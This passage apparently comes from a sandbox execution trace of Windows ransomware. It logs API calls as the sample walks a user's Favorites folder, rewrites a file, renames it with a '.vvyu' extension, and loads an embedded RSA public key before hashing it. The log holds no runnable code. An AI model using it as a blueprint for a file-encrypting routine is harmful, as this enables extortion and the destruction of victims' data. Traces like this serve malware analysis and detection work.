RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0189.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39910 [0189.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0189.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39970 [0189.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39988 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39928 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398f8 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0189.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0189.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0189.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39018 | out: hHeap=0x6a0000) returned 1 [0189.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.133] WriteFile (in: hFile=0x584, lpBuffer=0x794008*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x794008*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.135] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.135] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.137] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.137] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.137] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.138] CloseHandle (hObject=0x584) returned 1 [0189.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0189.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.140] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url.vvyu")) returned 1 [0189.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.142] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d9d0 | out: hHeap=0x6a0000) returned 1 [0189.146] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0189.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d9d0 [0189.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.146] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0189.147] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.147] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.147] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.150] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.150] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.151] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.152] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.152] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.153] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.153] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.153] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.153] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.153] GetLastError () returned 0x0 [0189.153] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.153] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.154] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.154] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.154] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.154] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39018 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39060 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.155] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39928 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39910 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.158] GetCurrentThreadId () returned 0x264 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d438b0 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.158] 